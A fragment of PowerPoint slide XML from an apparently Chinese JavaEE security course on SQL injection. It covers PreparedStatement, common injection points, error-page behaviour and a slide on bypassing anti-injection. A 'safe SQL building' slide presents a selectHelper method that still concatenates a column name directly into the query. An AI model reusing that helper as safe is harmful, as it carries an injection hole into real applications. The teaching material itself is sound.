              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PreparedStatement实现防注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL语句被预编译并存储在PreparedStatement对象中。然后可以</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用此对象多次高效地执行该语句。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Class.forName(MYSQLDRIVER);//加载MYSQL驱动 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Connection conn = DriverManager.getConnection(MYSQLURL);//获取数据库连接 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>String sql = "SELECT * from corps where id = ? ";//查询语句 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PreparedStatement pstt = conn.prepareStatement(sql);//获取预编译的PreparedStatement对象 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pstt.setObject(1, id);//使用预编译SQL </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ResultSet rs = pstt.executeQuery();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3797935" y="1272540"/>
            <a:ext cx="4838065" cy="14287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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>PreparedStatement实现防注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>String sql = "SELECT * from corps where id = ? "; </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pstt = conn.prepareStatement(sql);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//获取预编译的PreparedStatement对象 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>pstt.setObject(1, id);//使用预编译SQL </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ResultSet rs = pstt.executeQuery(); </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web中绕过SQL防注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SpringMvc如：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>@RequestMapping(value="/index.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>spx",method=RequestMethod.GET)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>public String index(HttpServletRequest request,HttpServletResponse response){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    System.out.println("------------");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    return "index";</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JavaEE 基础</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>看一下这个页面编译成class后是什么样子：</a:t>
            </a:r>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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1290955" y="1136650"/>
            <a:ext cx="6562090" cy="3599815"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Web当中最容易出现SQL注入的地方：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>常见的文章显示、分类展示。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>用户注册、用户登录处。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关键字搜索、文件下载处。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>数据统计处（订单查询、上传下载统计等）经典的如select下拉框注入。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>逻辑略复杂处(密码找回以及跟安全相关的)。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>关于注入页面报错：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如果发现页面抛出异常，那么得从两个方面去看问题，传统的SQL</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>注入在页面报错以后肯定没法直接从页面获取到数据信息。如果报</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>错后SQL没有往下执行那么不管你提交什么SQL注入语句都是无效</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的，如果只是普通的错误可以根据错误信息进行参数修改之类继续</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入。 假设我们的id改为int类型：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>int id = Integer.parseInt(request.getParameter("id")); </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1247775" y="1290955"/>
            <a:ext cx="6647815" cy="256159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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Spring中如何安全的拼SQL(JDBC同理)：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对于常见的SQL注入采用预编译就行了，但是很多时候条件较多或</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>较为复杂的时候，写了个这样的多条件查询条件自动匹配：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1665605"/>
            <a:ext cx="5076190" cy="3323590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="60000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Spring中如何安全的拼SQL(JDBC同理)：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>selectHelper方法：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>public static StringBuilder selectHelper(StringBuilder sql, Object obj[]){</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    if (Constants.SQL_HELPER_LIKE.equalsIgnoreCase(obj[2].toString())) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        sql.append(" AND "+obj[0]+" like ?");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    }else if (Constants.SQL_HELPER_EQUAL.equalsIgnoreCase(obj[2].toString())) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        sql.append(" AND "+obj[0]+" = ?");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    }else if (Constants.SQL_HELPER_GREATERTHAN.equalsIgnoreCase(obj[2].toString())) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        sql.append(" AND "+obj[0]+" &gt; ?");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    }else if (Constants.SQL_HELPER_LESSTHAN.equalsIgnoreCase(obj[2].toString())) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        sql.append(" AND "+obj[0]+" &lt; ?");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    }else if (Constants.SQL_HELPER_NOTEQUAL.equalsIgnoreCase(obj[2].toString())) {</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        sql.append(" AND "+obj[0]+" != ?");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>    return sql;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>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a:sym typeface="+mn-ea"/>
              </a:rPr>
